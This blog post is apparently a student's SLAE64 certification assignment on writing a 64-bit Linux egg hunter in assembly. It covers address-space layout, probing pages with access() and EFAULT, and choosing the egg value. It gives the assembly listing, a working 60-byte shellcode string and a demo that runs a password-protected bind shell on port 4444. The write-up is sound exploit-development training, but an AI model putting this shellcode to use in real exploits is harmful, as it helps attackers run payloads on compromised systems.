After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the third assignment; research and create an egg hunter proof of concept.
Egg hunting is a technique which can be used to solve shellcode space restriction problems. The egg hunter is a very small piece of code that searches the process memory for an ‘egg’; a signature consisting of a known sequence of bytes. This signature is used to mark the start of the real payload, which could be much larger. Once the signature is located, the instruction pointer is redirected to the new location and the larger payload is executed.
A 64-bit memory primer
In 64-bit systems the theoretical maximum address space is 16 Exabytes (18,446,744,073,709,551,616 bytes). However, the hardware requirements and management overhead of addressing the full memory range would be prohibitively expensive to implement. In current AMD64 implementations the lower 48 bits of an address are usable, allowing a virtual 256 TB (281,474,976,710,656 bytes) address space per application. The remaining bits of the upper two bytes must all match the state of the 47th bit (the last bit of the 6th byte) or a hardware exception is thrown.
The restriction on the upper two bytes of an address mean that there are two address range blocks in AMD64 systems: The first is from 0x0000000000000000 to 0x00007FFFFFFFFFFF and is used by applications, the second is from 0xFFFF800000000000 to 0xFFFFFFFFFFFFFFFF and is generally reserved for use by the operating system.
Our egg value and shellcode target are probably going to be either on the heap or the stack, so the memory region we need to search is the lower application range.
A first attempt
A naive implementation of the memory search would look something like this:
global _start section .text _start: push 0x1 ; Start address pop rdi mov eax, 0x42414241 ; Egg value _test: scasd ; compare and increment je _found ; Break if found loop _test ; Or keep scanning _found: jmp rdi ; Jump to payload
This code starts up by placing 1 in the RDI register and a target egg value in RAX. The INC and LOOP instructions take care of moving the RDI pointer across the memory range, while SCASD is used to to repeatedly compare the value of the referenced address with the egg value until we find a match. If a match is found, we jump to the location.
However, things are never that simple. Two problems crop up straight away with this approach:
First, we get a segmentation fault when trying to access address 0x0000000000000001. That area of memory is not readable by our process and the exception stops the search dead.
Looking at the memory map for our process while it is suspended in gdb, we can see that only small areas of the address space are accessible:
MBP:slae64$ ps -e | grep egg_hunter 3711 pts/0 00:00:00 egg_hunter MBP:slae64$ cat /proc/3711/maps 00400000-00401000 r-xp 00000000 08:01 408067 /home/codehead/SLAE64/assignment_3/egg_hunter 00600000-00601000 rwxp 00000000 08:01 408067 /home/codehead/SLAE64/assignment_3/egg_hunter 7ffff7ffd000-7ffff7fff000 r-xp 00000000 00:00 0 [vdso] 7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Second, even if we could continue the scan, we will hit the .text section of our program at 0x400000 first and find the egg value definition in the code before we have a chance to search the heap and stack further up the address space.
Validating address ranges
To address the first problem, we need to work out if we are permitted to read an address before accessing it. We have seen that a direct read of an invalid address will throw an exception and we don’t have the space to write an exception handler, but we can use the handlers that exist in other code. For example, passing a bad address as a parameter to a syscall simply returns an error as the return value from the call. This means we can use a syscall as a test to see if an address is valid by examining the return value. We are not interested in the actual result of the syscall, we simply need something that:
- Takes a memory reference as a parameter.
- Does not change the state of the system when executed correctly, I.e., does not write to memory or induce some unexpected state.
- Will return a clear indication that memory is readable or not.
- Has minimal other parameters for easy management.
A good candidate syscall is sys_access (0x15) which checks the current user’s permission’s for a specified file. The man page for access tells us that the parameters are a pathname string and a flags value. The string is our memory reference and we don’t care about the flags, they can be zero. The man page even includes the following handy detail about return values:
ERRORS access() may fail if: EFAULT - pathname points outside your accessible address space.
sys/errno.h gives us the value of EFAULT:
#define EFAULT 14 /* Bad address */
Looking back at the memory map we see that the blocks are sized in factors of 0x1000 or 4096 bytes. This is to be expected as 4k is the normal PAGE_SIZE value for x64 systems. Skipping through memory in 4k steps is much more preferable than testing each address individually and will speed up our search.
Here is a quick loop to step through memory and check for addressable regions:
mov rdx, 0x1000 ; 4k step mov rdi, 0 ; Start address mov rsi, 0 ; Empty flag argument for access() _page_test: mov rax, 0x15 syscall ; access() cmp rax, -14 ; Test for EFAULT jne short _valid ; OK to read add rdi, rdx ; Step to next page jmp _page_test ; Invalid, skip to next _valid: ...
This solves our first problem of invalid addresses. Now we can move on to searching the valid regions for our egg.
Choosing an egg value
As stated earlier, the first valid region that a low to high sweep of memory will encounter is the .text region where our code resides. As the egg value we’re looking for is defined in our code, we run the risk of discovering the wrong signature bytes early in our search. We could scan backwards through memory from high to low. That might be desirable if we know our payload is on the stack. However, with a 48bit address space, we will need to start from the low values if our payload is on the heap.
To avoid false positives, we’ll use a four byte egg value and repeat it at the start of our target shellcode. That way we have an 8 byte marker for the main payload, but only 4 bytes of it in the hunting code.
Another consideration is that our search function will jump the instruction pointer to the start of our marker. The bytes need to form valid instructions that do not change the state of anything. We could use ‘no operation’ codes (0x90 NOP) to slide past the signature, but multiple NOP instructions are commonly found as padding between functions, so they are not a good choice.
In the end I chose a nonsense statement formed from two complementing jumps:
eb 02 jmp 2 eb fc jmp -4
When the instruction pointer lands on the first byte, it jumps past the second instruction. This jump over/jump back combination would be unlikely to occur in real code and it has no sensible ASCII value. Hopefully the 8 byte version will be unique in memory.
eb 02 eb fc eb 02 eb fc
We can build the full egg value from a 4 byte template in a spare register.
mov ebx, 0xfceb02eb ; Build egg in RBX push rbx shl rbx, 32 or rbx, [rsp]
The payload is a string, so the template must be reversed in the initial DWORD.
Now that we have a valid page and a good egg value, we can work on scanning the page regions.
Hunting the egg
When researching the egg hunter technique, I found 32bit implementations that used scasd to compare the egg value to memory in 4 byte steps. The scas instruction is compact and increments the memory pointer automatically, helping to produce small shellcode. Doing the scas check twice to find an 8 byte egg also moved rdi past the signature bytes, removing the need for a valid executable egg as the jump to the payload will land on the first executable byte of the actual payload after the signature.
On x64 we could use sacsq to do 8 byte comparisons. However, I found that there is no guarantee that the egg signature would be aligned to an 8 byte boundary, so opted to increment rdi manually by one byte at a time and use cmp with the full 64 bit registers for my search.
_valid: mov rcx, 0xff8 ; Loop count _egg_test: cmp rbx, [rdi] ; Test content of rdi against rbx je _found ; If we found the egg, jump to the location inc rdi ; Move to next address loop _egg_test ; Repeat ; If we've covered the whole page, add rdi, 8 ; add 8 to rdi, placing the pointer on the next page jmp _page_test ; Validate the page _found: jmp rdi ; Execute the egg and payload
The code above uses a loop with a count of 0xff8 in RCX this is 8 bytes short of 4k to avoid the read extending into an unvalidated area on the next page as we approach the end of a block. This does mean that we could miss a signature if it spans a page boundary, but the chances are low.
Building the shellcode
After removing all NULL values and squeezing the size of the code down, we end up with the finished listing at egg_hunter.nasm. This code results in a 60 byte shellcode string:
| egg value | V V \xbb\xeb\x02\xeb\xfc\x53\x48\xc1\xe3\x20\x48\x0b\x1c\x24\x48\x31\xd2\x52\xb6\x10 \x5f\x57\x5e\x6a\x15\x58\x0f\x05\x3c\xf2\x75\x05\x48\x01\xd7\xeb\xf2\x52\x59\x83 \xe9\x08\x48\x3b\x1f\x74\x0b\x48\xff\xc7\xe2\xf6\x48\x83\xc7\x08\xeb\xdd\xff\xe7
Bytes 1 - 4 are the egg signature block.
The nasm version uses a .data section to simulate a payload which simply prints ‘OK’ then quits. This shows that the principle of the code works, but we’ll need a proper test to be sure.
Egg hunter demo
The heap contains a random number of pages and payload page is also padded with a random number of bytes to test out the hunting code thoroughly. The egg hunter finds the signature quickly and we can connect from another terminal almost immediately.
MBP:slae64$ ./egg_demo Allocating heap data Padding heap with 294 pages of junk Padding payload page by 480 bytes Appending payload Triggering egg hunter
MBP:slae64$ nc 127.0.0.1 4444 Speak friend and enter: password Welcome pwd /home/codehead/SLAE64/assignment_3 exit
At 60 bytes, the code is reasonably small. Some of the examples I discovered when researching the topic were around 30-40 bytes. However, larger x64 opcodes, the lack of instructions such as pusha and popa plus the choice to go for per-byte searching over scas meant that getting down to the same size as 32bit code would always be difficult.
My implementation does suffer some speed issues. While the in-page search is fast, extensive memory validation is not. Heap based payloads are discovered quickly, but if the search extends to the stack, the sheer size of the address space means that a low to high scan is impractical. In tests with egg_hunter_stack_demo.c, the code took over 6 hours to locate a stack based signature. It would be better to have a specific version of the egg hunter code that scans from high to low for situations where the payload is known to be stack based.
This concludes the assessment. Writing this code was a challenge, but a good learning experience.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE64-1471